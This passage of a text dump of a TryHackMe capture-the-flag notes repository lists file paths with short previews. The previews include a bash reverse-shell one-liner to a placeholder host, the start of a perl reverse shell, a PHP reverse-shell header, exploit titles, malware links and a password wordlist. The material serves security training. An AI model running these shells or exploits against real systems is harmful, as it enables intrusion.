"preview": "# Linux Fundamentals - Part 1\n\n- Read the above\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE: "
},
{
"path": "Linux-Fundamentals/Linux-Fundamentals-Part-2/README.md",
"chars": 2019,
"preview": "# Linux Fundamentals - Part 2\n\n- Read the above.\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE:"
},
{
"path": "Linux-Fundamentals/Linux-Fundamentals-Part-3/README.md",
"chars": 1924,
"preview": "# Linux Fundamentals - Part 3\n\n- Read the above\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE: "
},
{
"path": "Linux-Strength-Training/README.md",
"chars": 9811,
"preview": "# Linux Strength Training\n\n- I have read and understood\n\n\t no answer needed\n\n- What is the correct option for finding f"
},
{
"path": "Linux:-Local-Enumeration/README.md",
"chars": 1176,
"preview": "# Linux: Local Enumeration\n\n- Let's go!\n\n\t no answer needed\n\n- How would you execute /bin/bash with perl?\n\n\t- `perl -e "
},
{
"path": "MAL:-REMnux-The_Redux/README.md",
"chars": 1099,
"preview": "# MAL: REMnux - The Redux\n\n- I'm all buckled up and ready to get started.\n\n\t no answer needed\n\n- I've deployed my insta"
},
{
"path": "NIS-Linux_Part_I/README.md",
"chars": 3164,
"preview": "# NIS - Linux Part I\n\n- What is shiba3's password?\n\n\t- `ssh chad@<TARGET_IP>` and enter password.\n\t- See [Linux Fundamen"
},
{
"path": "Nessus/README.md",
"chars": 3103,
"preview": "# Nessus\n\n- I have read the description!\n\n\t no answer needed\n\n- Go to https://www.tenable.com/products/nessus/nessus-es"
},
{
"path": "Network-Services/README.md",
"chars": 6118,
"preview": "# Network Services\n\n- Ready? Let's get going!\n\n\t no answer needed\n\n- What does SMB stand for?\n\n\t- `Server Message Block"
},
{
"path": "Network-Services-2/README.md",
"chars": 7925,
"preview": "# Network Services 2\n\n- Ready? Let's get going!\n\n\t no answer needed\n\n- What does NFS stand for?\n\n\t- `Network File Syste"
},
{
"path": "Networking/README.md",
"chars": 1926,
"preview": "# Networking\n\n- How many categories of IPv4 addresses are there?\n\n\t- `5`\n\n- Which type is for research? *Looking for a l"
},
{
"path": "Ninja-Skills/README.md",
"chars": 1902,
"preview": "# Ninja Skills\n\n- Which of the above files are owned by the best-group group(enter the answer separated by spaces in alp"
},
{
"path": "Nmap/README.md",
"chars": 5477,
"preview": "# Nmap\n\n- Deploy the attached VM\n\n\t no answer needed\n\n- What networking constructs are used to direct traffic to the ri"
},
{
"path": "OWASP-Juice-Shop/README.md",
"chars": 5661,
"preview": "# OWASP Juice Shop\n\n\n- Deploy the VM attached to this task to get started! You can access this machine by using your bro"
},
{
"path": "OWASP-Juice-Shop/ftp/acquisitions.md",
"chars": 909,
"preview": "# Planned Acquisitions\n\n> This document is confidential! Do not distribute!\n\nOur company plans to acquire several compet"
},
{
"path": "OWASP-Juice-Shop/ftp/announcement_encrypted.md",
"chars": 369237,
"preview": "101090574497118278254226137710017536639773765857153659738605695408072928921910711582659759064103895163344910061580267891"
},
{
"path": "OWASP-Juice-Shop/ftp/coupons_2013.md.bak%00..md",
"chars": 131,
"preview": "n<MibgC7sn\nmNYS#gC7sn\no*IVigC7sn\nk#pDlgC7sn\no*I]pgC7sn\nn(XRvgC7sn\nn(XLtgC7sn\nk#*AfgC7sn\nq:<IqgC7sn\npEw8ogC7sn\npes[BgC7sn"
},
{
"path": "OWASP-Juice-Shop/ftp/eastere.gg%00.md",
"chars": 324,
"preview": "\"Congratulations, you found the easter egg!\"\n- The incredibly funny developers\n\n...\n\n...\n\n...\n\nOh' wait, this isn't an e"
},
{
"path": "OWASP-Juice-Shop/ftp/legal.md",
"chars": 3047,
"preview": "# Legal Information\n\nLorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy\neirmod tempor invidunt ut "
},
{
"path": "OWASP-Juice-Shop/ftp/package.json.bak%00.md",
"chars": 4425,
"preview": "{\n \"name\": \"juice-shop\",\n \"version\": \"6.2.0-SNAPSHOT\",\n \"description\": \"An intentionally insecure JavaScript Web Appl"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_linux_amd_64.url",
"chars": 162,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_linux_arm_64.url",
"chars": 162,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_macos_64.url",
"chars": 158,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_windows_64.exe.url",
"chars": 164,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/suspicious_errors.yml%00.md",
"chars": 723,
"preview": "title: Suspicious error messages specific to the application\ndescription: Detects error messages that only occur from ta"
},
{
"path": "OWASP-Top-10/47887.py",
"chars": 2109,
"preview": "# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution\r\n# Google Dork: N/A\r\n# Date: 2020-01-07\r\n"
},
{
"path": "OWASP-Top-10/48973.txt",
"chars": 776,
"preview": "# Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting\r\n# Date: 30/10/2020\r\n# Exploit Author: V"
},
{
"path": "OWASP-Top-10/README.md",
"chars": 9738,
"preview": "# OWASP Top 10\n\n\n\n\nThis room break"
},
{
"path": "OWASP-Top-10/login-logs.txt",
"chars": 700,
"preview": "200 OK 12.55.22.88 jr22 2019-03-18T09:21:17 /login\n200 OK 14.56.23.11 rand99 2019-03"
},
{
"path": "OWASP-Top-10/rce.py",
"chars": 428,
"preview": "# https://gist.githubusercontent.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3/raw/f0fce6310455d8c345bbc9ec81f41d224896b9"
},
{
"path": "Overpass/README.md",
"chars": 1669,
"preview": "# Overpass\n\n- Hack the machine and get the flag in user.txt\n\n\t- `nmap -sV -p- <TARGET_IP>`\n\t- `scilla dir -target <TARGE"
},
{
"path": "Overpass/downloads/src/buildscript.sh",
"chars": 41,
"preview": "bash -i >& /dev/tcp/<YOUR_IP>/1234 0>&1;\n"
},
{
"path": "Overpass2-Hacked/README.md",
"chars": 1975,
"preview": "# Overpass 2 - Hacked\n\n\n\nIf you ar"
},
{
"path": "Overpass2-Hacked/fasttrack.txt",
"chars": 1549,
"preview": "P@55w0rd\nP@ssw0rd!\nP@55w0rd!\nsqlsqlsqlsql\nSQLSQLSQLSQL\nWelcome123\nWelcome1234\nWelcome1212\nPassSql12\nnetwork\nnetworking\nn"
},
{
"path": "Persistence/README.md",
"chars": 353,
"preview": "# Persistence\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n\t- This part is really we"
},
{
"path": "Pickle-Rick/README.md",
"chars": 1926,
"preview": "# Pickle Rick\n\nThis Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will "
},
{
"path": "Pickle-Rick/reverse-shell.sh",
"chars": 225,
"preview": "perl -e 'use Socket;$i=\"YOUR-IP-ADDRESS\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockad"
},
{
"path": "Post-Exploitation-Basics/README.md",
"chars": 444,
"preview": "# Post-Exploitation Basics\n\n- Deploy the Machine\n\n\tno answer needed\n\n- What is the shared folder that is not set by defa"
},
{
"path": "README.md",
"chars": 4420,
"preview": "<h2 align=\"center\">\n <b>TryHackMe notes, code, PoC, solutions, writeups, scribbles, drafts...</b>\n</h2>\n\n<p align=\"cent"
},
{
"path": "Regular-expressions/README.md",
"chars": 2884,
"preview": "# Regular expressions\n\n- Read the above.\n\n\t no answer needed\n\n- Match all of the following characters: c, o, g\n\n\t- `[co"
},
{
"path": "Res/README.md",
"chars": 1633,
"preview": "# Res\n\n- Scan the machine, how many ports are open?\n\n\t- `scilla port -target <TARGET_IP>`\n\t- `*`\n\n- What's is the databa"
},
{
"path": "RootMe/README.md",
"chars": 1324,
"preview": "# RootMe\n\n\n- Deploy the machine\n\n\tno answer needed\n\n- Scan the machine, how many ports are open?\n\n\t- `nmap <TARGET_IP>`\n"
},
{
"path": "RootMe/reverse-shell.php5",
"chars": 5492,
"preview": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net"
},
{
"path": "SSRF/README.md",
"chars": 252,
"preview": "# SSRF\n\n- Deploy the VM\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer ne"
},
{
"path": "Searchlight-IMINT/README.md",
"chars": 1615,
"preview": "# Searchlight - IMINT\n\n- Did you understand the flag format?\n\n\t- `sl{ready}`\n\n- What is the name of the street where thi"
},
{
"path": "Skynet/README.md",
"chars": 2364,
"preview": "# Skynet\n\n- What is Miles password for his emails?\n\n\t- `scilla port -target <TARGET_IP>`\n\t- 6 ports open...\n\t- Looking t"
},
{
"path": "Starting-Out-In-Cyber-Sec/README.md",
"chars": 320,
"preview": "# Starting Out In Cyber Sec\n\n- Read Me and Proceed!\n\n\t no answer needed\n\n- What is the name of the career role that is "
},
{
"path": "Startup/README.md",
"chars": 1836,
"preview": "# Startup\n\n- What is the secret spicy soup recipe?\n\n\t- `nmap -sV 10.10.96.10`\n\t- `ftp <TARGET_IP>` in anonymous mode\n\t- "
},
{
"path": "Startup/notice.txt",
"chars": 208,
"preview": "Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our websi"
},
{
"path": "Steel-Mountain/README.md",
"chars": 1672,
"preview": "# Steel Mountain\n\n- Who is the employee of the month?\n\n\t- Save that image and perform a reverse image search.\n\t- `Bill *"
},
{
"path": "Sublist3r/README.md",
"chars": 2806,
"preview": "# Sublist3r\n\n- You can find Sublist3r [here!](https://github.com/aboul3la/Sublist3r) We'll install this in the next task"
},
{
"path": "Sublist3r/sub-output-nbc.txt",
"chars": 4409,
"preview": "msnbc.com<BR>nbc.com\nwww.xn--12-nbc.com<BR>xn--12-nbc.com\nwww.nbc.com\n30rock.nbc.com\nacc-api.nbc.com\nacc-img.nbc.com\nacc"
},
{
"path": "The-Cod-Caper/README.md",
"chars": 2079,
"preview": "# The Cod Caper\n\n- Help me out! :)\n\n\t no answer needed\n\n- How many ports are open on the target machine?\n\n\t- `scilla po"
},
{
"path": "The-find-command/README.md",
"chars": 1730,
"preview": "# The find command\n\n- Read and follow the instructions.\n\n\t no answer needed\n\n- Find all files whose name ends with \".xm"
},
{
"path": "Toolbox-Vim/README.md",
"chars": 1988,
"preview": "# Toolbox: Vim\n\n- Install Vim\n\n\t no answer needed\n\n- Launch Vim\n\n\t no answer needed\n\n- How do we enter \"INSERT\" mode? "
},
{
"path": "ToolsRus/README.md",
"chars": 1209,
"preview": "# ToolsRus\n\n- What directory can you find, that begins with a \"g\"?\n\n\t- Considering using Scilla `scilla dir -target <TAR"
},
{
"path": "Tor/README.md",
"chars": 1961,
"preview": "# Tor\n\n- Run apt-get install tor to install/update your Tor packages\n\n\t no answer needed\n\n- Run `service tor start` to "
},
{
"path": "Upload-Vulnerabilities/README.md",
"chars": 3354,
"preview": "# Upload Vulnerabilities\n\n- Configure your hosts file for the task, as per the instructions above.\n\n\t no answer needed\n"
},
{
"path": "Web-Scanning/README.md",
"chars": 4461,
"preview": "# Web Scanning\n\n- Deploy the machine!\n\n\t no answer needed\n\n- First and foremost, what switch do we use to set the targe"
},
{
"path": "Wgel-CTF/README.md",
"chars": 804,
"preview": "# Wgel CTF\n\nHave fun with this easy box.\n\n- User flag\n\n\t- The first thing I notice is that the port 80 is open and it di"
},
{
"path": "What-the-Shell?/README.md",
"chars": 4331,
"preview": "# What the Shell?\n\n- Read and understand the introduction.\n\n\t no answer needed\n\n- Read the above and check out the link"
},
{
"path": "Windows-PrivEsc/README.md",
"chars": 1609,
"preview": "# Windows PrivEsc\n\n- Deploy the Windows VM and login using the \"user\" account.\n\n\t no answer needed\n\n- Generate a revers"
},
{
"path": "Wireshark-101/README.md",
"chars": 2910,
"preview": "# Wireshark 101\n\n- Read the above and move on to Installation.\n\n\t no answer needed\n\n- Read the above, and ensure you ha"
},
{
"path": "XXE/README.md",
"chars": 1102,
"preview": "# XXE\n\n- Deploy the VM\n\n\t no answer needed\n\n- Full form of XML\n\n\t- `Extensible markup Language`\n\n- Is XML case sensitiv"
},
{
"path": "Year-of-the-Rabbit/README.md",
"chars": 1184,
"preview": "# Year of the Rabbit\n\n- What is the user flag?\n\n\t- `scilla port -target <TARGET_IP>`\n\t- `21, 22, 80` open.\n\t- `scilla di"
},
{
"path": "ZTH:-Obscure-Web-Vulns/README.md",
"chars": 1894,
"preview": "# ZTH: Obscure Web Vulns\n\n- Read the Intro.\n\n\t no answer needed\n\n- Read the above!\n\n\t no answer needed\n\n- Read the abo"
},
{
"path": "ZTH:-Web_2/README.md",
"chars": 629,
"preview": "# ZTH: Web 2\n\n- Read the above\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above.\n\n\t no an"
},
{
"path": "Zero-Logon/README.md",
"chars": 1240,
"preview": "# Zero Logon\n\n- Read about Zero Logon\n\n\t no answer needed\n\n- Install Impacket in a Virtual Environment \n\n\t no answer n"
},
{
"path": "cc-pentesting/README.md",
"chars": 12092,
"preview": "# CC - PENTESTING // TRYHACKME\n\n### [Section 1 - Network Utilities] - nmap \n\n- What does nmap stand for?\n\n\t- `network ma"
},
{
"path": "crack-the-hash/hash1_4.txt",
"chars": 61,
"preview": "$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom\n"
},
{
"path": "crack-the-hash/hash2_1.txt",
"chars": 65,
"preview": "F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85\n"
},
{
"path": "crack-the-hash/hash2_2.txt",
"chars": 33,
"preview": "1DFECA0C002AE40B8619ECF94819CC1B\n"
}
]
// ... and 30 more files (download for full content)
About this extraction
This page contains the full source code of the edoardottt/tryhackme-ctf GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 230 files (878.7 KB), approximately 289.1k tokens, and a symbol index with 15 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.